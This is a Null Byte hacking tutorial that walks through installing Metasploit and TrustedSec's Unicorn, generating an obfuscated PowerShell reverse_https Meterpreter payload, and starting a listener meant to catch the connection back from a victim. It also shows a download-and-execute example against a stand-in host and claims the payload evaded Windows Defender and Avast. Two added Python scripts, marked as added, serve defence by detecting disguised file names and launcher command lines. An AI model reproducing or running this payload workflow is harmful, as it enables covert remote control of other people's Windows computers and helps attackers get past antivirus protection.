
Creating an Unrecognizable Payload, Part 1 (Bypassing Antivirus Software) « Null Byte :: WonderHowTo



Hackers are always looking for zero-day exploits that can bypass the security features of Windows 10. Extensive research has gone into creating undetectable malware, and entire GitHub projects exist to automate the creation of unrecognizable payloads, such as WinPayloads, Veil v3, and TheFatRat.

Getting a target user to open a malicious file can take nothing more than a little social engineering and a bit of Unicode in the file name. For example, the following GIF shows a Windows executable (EXE) disguised as a plain text (TXT) file, even when File Explorer's option to hide extensions for known file types is turned off.

Make no mistake, the file on the right is an executable and, more importantly, is recognized by the Windows operating system as an executable. When the fake text file is clicked, it opens a new document in Notepad, the default text editor in Windows 10. After Notepad opens, the file silently executes an embedded PowerShell payload (created with Unicorn), which establishes a backdoor on the now-compromised Windows computer.
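
Added example, not from the article: a small Python check a defender can run over file names (mail attachments, a download directory) to catch the Unicode trick described above. It reports the extension Windows actually uses, which is whatever follows the last dot in the stored name, and flags invisible Unicode format characters, including the bidirectional overrides that make a name render differently from how it is stored. The sample names and the extension list are constructed for this example.

```python
"""Flag file names that use invisible Unicode to disguise their real extension.

Added example, not part of the original article. Windows decides the file type
from the text after the last '.' in the *stored* name; Unicode format
characters (category Cf, which includes the bidirectional overrides) can make
the *rendered* name look different, e.g. an .exe that displays as a .txt.
"""
import unicodedata

# Bidirectional embedding/override/isolate controls that change rendering order.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",   # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",             # LRI, RLI, FSI, PDI
}

# Extensions Windows will execute or script-launch (constructed list, not exhaustive).
EXECUTABLE_EXTENSIONS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "ps1", "vbs", "js", "jse",
    "wsf", "hta", "lnk", "msi",
}


def real_extension(name: str) -> str:
    """Extension the OS uses: text after the last '.' of the stored name, lowercased."""
    head, sep, tail = name.rpartition(".")
    return tail.lower() if sep else ""


def invisible_chars(name: str) -> list:
    """(position, Unicode name) for every format (Cf) character in the name."""
    return [
        (i, unicodedata.name(ch, "U+%04X" % ord(ch)))
        for i, ch in enumerate(name)
        if unicodedata.category(ch) == "Cf"
    ]


def assess_filename(name: str) -> dict:
    """Return the real extension, the hidden characters and a list of findings."""
    ext = real_extension(name)
    hidden = invisible_chars(name)
    findings = []
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("bidirectional control character present")
    elif hidden:
        findings.append("invisible format character present")
    if ext in EXECUTABLE_EXTENSIONS and hidden:
        findings.append("executable extension .%s hidden by Unicode" % ext)
    return {
        "name": name,
        "real_extension": ext,
        "invisible": hidden,
        "findings": findings,
        "suspicious": bool(findings),
    }


# Constructed sample names: a normal text file, a right-to-left override that
# makes "report<RLO>txt.exe" render as "reportexe.txt", and a zero-width space.
SAMPLE_NAMES = ["report.txt", "report\u202etxt.exe", "safe\u200bname.txt"]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        result = assess_filename(n)
        print(repr(n), "->", result["real_extension"], result["findings"])
```

The check deliberately keys on the stored name rather than on how a file manager renders it; anything that reaches the user through a rendering layer (File Explorer, a mail client) can be compared against `real_extension` before the user ever double-clicks.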

Unicorn, developed by TrustedSec, is a simple tool designed to support penetration tests with PowerShell downgrade attacks and to inject sophisticated shellcode payloads directly into memory. The techniques used by Unicorn are based on the work of Matthew Graeber and the founder of TrustedSec, David Kennedy.

Step 1: Install Metasploit Framework

Metasploit is a dependency of Unicorn. Before installing Unicorn, I'll quickly walk readers through a Metasploit installation to make sure it is up to date with the GitHub repository.

Kali does an excellent job of maintaining stable versions of Metasploit, but I'll show you how to install the absolute latest version. First, remove older versions of Metasploit that may be preinstalled in Kali.

  apt-get remove metasploit-framework 

Then use cURL to download the Metasploit installer.

  curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Update the permissions of the newly created msfinstall file so that it can be executed in Kali.

  chmod 755 msfinstall 

Then run the installer script with ./msfinstall.

  ./msfinstall

Adding metasploit-framework to your repository list..OK
Updating package cache..OK
Checking for and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 124 not upgraded.
Need to get 161 MB of archives.
After this operation, 377 MB of additional disk space will be used.
Get:1 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 metasploit-framework amd64 4.16.57+20180529103642.git.4.6219ce0~1rapid7-1 [161 MB]
Fetched 65.7 MB in 11min 39s (93.9 kB/s)
Selecting previously unselected package metasploit-framework.
(Reading database ... 145965 files and directories currently installed.)
Preparing to unpack .../metasploit-framework_4.16.57+20180529103642.git.4.6219ce0~1rapid7-1_amd64.deb ...
Unpacking metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
Setting up metasploit-framework (4.16.57+20180529103642.git.4.6219ce0~1rapid7-1) ...
update-alternatives: using /opt/metasploit-framework/bin/msfbinscan to provide /usr/bin/msfbinscan (msfbinscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfconsole to provide /usr/bin/msfconsole (msfconsole) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfd to provide /usr/bin/msfd (msfd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfdb to provide /usr/bin/msfdb (msfdb) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfelfscan to provide /usr/bin/msfelfscan (msfelfscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfmachscan to provide /usr/bin/msfmachscan (msfmachscan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfpescan to provide /usr/bin/msfpescan (msfpescan) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrop to provide /usr/bin/msfrop (msfrop) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpc to provide /usr/bin/msfrpc (msfrpc) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfrpcd to provide /usr/bin/msfrpcd (msfrpcd) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfupdate to provide /usr/bin/msfupdate (msfupdate) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/msfvenom to provide /usr/bin/msfvenom (msfvenom) in auto mode
update-alternatives: using /opt/metasploit-framework/bin/metasploit-aggregator to provide /usr/bin/metasploit-aggregator (metasploit-aggregator) in auto mode
Run msfconsole to get started
W: --force-yes is deprecated, use one of the options starting with --allow instead.

When the installer completes, the /opt directory contains a new metasploit-framework/ directory.

Step 2: Install Unicorn

Once Metasploit is installed, the Unicorn GitHub repository can be cloned with git clone.

  git clone https://github.com/trustedsec/unicorn

Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done.

Then use the cd command to switch to the new Unicorn directory.

  cd unicorn/

To see the available Unicorn options and a full description of each attack, run ./unicorn.py with the --help argument.

  ./unicorn.py --help

-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy magic unicorns.

Usage: python unicorn.py payload reverse_ipaddr port
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py  cs macro
Macro Example Shellcode: python unicorn.py  shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py  cs hta
HTA Example Shellcode: python unicorn.py : shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py  crt
Custom PS1 Example: python unicorn.py 
Custom PS1 Example: python unicorn.py  macro 500
Cobalt Strike Example: python unicorn.py  cs (export CS in C# format)
Custom Shellcode: python unicorn.py  shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

There are several interesting and effective Unicorn options. In this article, I'll focus on the PowerShell and Meterpreter approach.

Step 3: Generating the payload

Use the following command to create a payload with Unicorn:

  ./unicorn.py windows/meterpreter/reverse_https

Unicorn uses the Metasploit reverse_https payload to connect back to the attacker's IP address on the specified port.

  [*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

[Unicorn ASCII-art banner]

Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

Happy magic unicorns.

[********************************************************************************************************]

----- POWERSHELL ATTACK INSTRUCTIONS ----

Everything is now created in two files, powershell_attack.txt and unicorn.rc. The text file contains all the code needed to inject the PowerShell attack into memory. Note that you need a location that supports remote command injection in some way. Often this could be through an Excel/Word document or through psexec_commands within Metasploit, SQLi, etc. There are so many implications and scenarios where you can use this attack. Simply paste the powershell_attack.txt command into any command prompt window, or anywhere you can invoke the PowerShell executable, and you will get a shell back. This attack also supports windows/download_exec as a payload method instead of Meterpreter payloads. If you are using download and exec, just run python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the PowerShell code will download and run the payload.

Note that you must have a listener enabled to capture the attack.

[*******************************************************************************************************]

[*] Exported PowerShell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create the listener.

Once Unicorn has generated the payload, two new files exist. The first is powershell_attack.txt, which can be viewed with the command cat powershell_attack.txt. It holds the PowerShell code that runs on the Windows 10 target and connects back to the Meterpreter handler.

  cat powershell_attack.txt

powershell /w 1 /C "s'v Mx -; s'v CV e; s'v nU ((g'v Mx).value.toString()+(g'v CV).value.toString()); powershell (g'v nU).value.toString() ('JAB...')"

[The base64-encoded PowerShell command that follows is several kilobytes long and is truncated and garbled in the source.]
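
As an added example that is not part of the article or of Unicorn, the following Python script shows the defender's view of a launcher like the one above. It takes a process command line as a Sysmon Event ID 1 or Windows 4688 event would record it, decodes long base64 arguments as UTF-16LE (the encoding PowerShell uses), and scores the traits visible in Unicorn's output: a hidden window (/w 1), cmdlet aliases split with quotes (s'v, g'v), a nested powershell call, and decoded script text that references memory-allocation APIs such as VirtualAlloc or iex (Invoke-Expression). The sample command lines, the alias and indicator lists and the scoring are constructed for this example; the embedded script text is inert.

```python
"""Triage a PowerShell command line for the traits of an in-memory launcher.

Added example, not part of the original article or of Unicorn. Input is a
process command line as Sysmon Event ID 1 or Windows Event 4688 (with
command-line auditing) records it. The checks, indicator lists and sample
lines are constructed for this example; the embedded script text is inert.
"""
import base64
import re

POWERSHELL = re.compile(r"\bpowershell(\.exe)?\b", re.I)
# -w 1 / -WindowStyle Hidden (1 is the numeric value of Hidden); PowerShell accepts / or -.
HIDDEN_WINDOW = re.compile(r"[-/](w|win|windowstyle)\s+(1|h|hidden)\b", re.I)
# A cmdlet alias broken in two by a quote, e.g. s'v for sv (Set-Variable).
QUOTE_SPLIT = re.compile(r"\b([a-z]+)['\"]([a-z]+)\b", re.I)
SPLIT_ALIASES = {"sv", "gv", "iex", "sal", "gal", "gc", "icm", "iwr"}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Strings a decoded in-memory injection script tends to contain (constructed list).
SCRIPT_INDICATORS = (
    "virtualalloc", "createthread", "dllimport", "iex", "invoke-expression",
    "frombase64string", "syswow64",
)


def decode_b64(token: str) -> str:
    """Decode a base64 token, as UTF-16LE when it looks like PowerShell text, else UTF-8."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return ""
    # ASCII text in UTF-16LE has a zero high byte for (nearly) every character.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        enc = "utf-16-le"
    else:
        enc = "utf-8"
    try:
        return raw.decode(enc)
    except UnicodeDecodeError:
        return ""


def analyze_command_line(cmdline: str) -> dict:
    """Score a command line; a higher score means more launcher-like."""
    findings = []
    if not POWERSHELL.search(cmdline):
        return {"score": 0, "findings": findings, "decoded": ""}
    if HIDDEN_WINDOW.search(cmdline):
        findings.append("hidden window (-w 1 / -WindowStyle Hidden)")
    if any((m.group(1) + m.group(2)).lower() in SPLIT_ALIASES
           for m in QUOTE_SPLIT.finditer(cmdline)):
        findings.append("quote-split cmdlet alias (e.g. s'v, g'v)")
    if len(POWERSHELL.findall(cmdline)) > 1:
        findings.append("nested powershell invocation")
    tokens = B64_TOKEN.findall(cmdline)
    if tokens:
        findings.append("long base64 argument")
    decoded = "\n".join(decode_b64(t) for t in tokens)
    low = decoded.lower()
    findings.extend("decoded script references %s" % ind
                    for ind in SCRIPT_INDICATORS if ind in low)
    return {"score": len(findings), "findings": findings, "decoded": decoded}


# Constructed, inert script text that merely mentions the indicator strings.
INERT_SCRIPT = "$a = 'VirtualAlloc'; iex 'Write-Output demo'"
ENCODED = base64.b64encode(INERT_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LINES = [
    # constructed launcher with the shape of Unicorn's output, carrying the inert script
    "powershell /w 1 /C \"s'v Mx -; s'v CV e; powershell (g'v nU).value.toString() ('"
    + ENCODED + "')\"",
    # constructed benign administrative task
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    # constructed non-PowerShell process
    r"C:\Windows\System32\notepad.exe C:\Users\demo\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        result = analyze_command_line(line)
        print(result["score"], result["findings"])
```

The score is a sum of independent traits rather than a signature on the base64 blob, because the blob changes with every generated payload while the launcher shape (hidden window, quote-split aliases, nested powershell, a decoded script that allocates memory) does not.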

The other file created by Unicorn, unicorn.rc, is a Metasploit resource file containing the msfconsole commands that set up the listener, so that step can be automated.

Step 4: Start Msfconsole with the resource file

To start Metasploit with the listener preconfigured, execute the command msfconsole -r /opt/unicorn/unicorn.rc (adjust the path if Unicorn was cloned elsewhere).

  msfconsole -r /opt/unicorn/unicorn.rc

       =[ metasploit v4.16.59-dev-                        ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.

[-] Handler failed to bind to 192.168.1.5:443
msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443

The resource file automatically selects the handler (multi/handler), sets the payload type (windows/meterpreter/reverse_https), sets the attacker's IP address (LHOST) and port (LPORT), keeps the handler alive after the first session (ExitOnSession false), enables stage encoding (EnableStageEncoding), and starts the listener as a background job (exploit -j) – easy. Note in the output above that the handler could not bind to 192.168.1.5:443 and instead listens on all interfaces (0.0.0.0:443).

At this point everything on the attacker's side is set up and ready for incoming connections. What remains is to verify that the payload works and actually gets past Windows Defender and antivirus software.

Step 5: Testing the Payload (Do not Upload to VirusTotal)

In my tests, Unicorn's PowerShell payload bypassed Google Chrome, Windows Defender, and Avast antivirus detections on a fully patched Windows 10 Enterprise computer.

Many projects warn penetration testers against the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer expressly warns against using VirusTotal each time the program is started.

As someone who regularly experiments with antivirus-bypass tools, I understand the temptation to find out whether a freshly created payload will get past the most popular antivirus engines. However, uploading to online virus scanners is extremely harmful to these projects. VirusTotal shares uploaded samples with third-party vendors, which dramatically increases overall detection rates in a short time.

As an alternative to online scanners, I encourage pentesters to replicate the target's operating system environment with virtual machines. For example, if a target on the local network is found to be running Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest version of that antivirus in the VM, and test the payload there. This gives the pentester confidence that the payload works as intended and keeps VirusTotal from analyzing the malicious file and sharing its results with other vendors.

Continuing with the Payload ...

That covers installing Metasploit, creating the PowerShell payload with Unicorn, and automating the msfconsole startup with the resource file. Unicorn is a great tool for creating advanced PowerShell payloads that are difficult for common antivirus software to detect. In my follow-up article, I'll show how to turn the PowerShell code into an executable file and use a few tricks to make the executable appear to be a plain text file.

Cover image by Justin Meyers/Null Byte; screenshots by tokyoneon/Null Byte



